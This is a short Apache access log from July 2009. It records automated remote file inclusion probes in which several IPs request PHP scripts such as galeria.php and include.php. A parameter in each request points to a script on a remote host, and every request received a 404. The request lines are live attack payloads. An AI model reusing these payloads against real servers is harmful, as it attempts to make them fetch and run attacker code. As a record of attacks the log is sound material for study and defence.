213.198.76.196 - - [18/Jul/2009:01:15:02 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:15:03 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
91.121.89.135 - - [18/Jul/2009:01:15:15 -0400] "GET //galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:15:15 -0400] "GET /logs//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:15:15 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:15:19 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:01:15:19 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:15:19 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
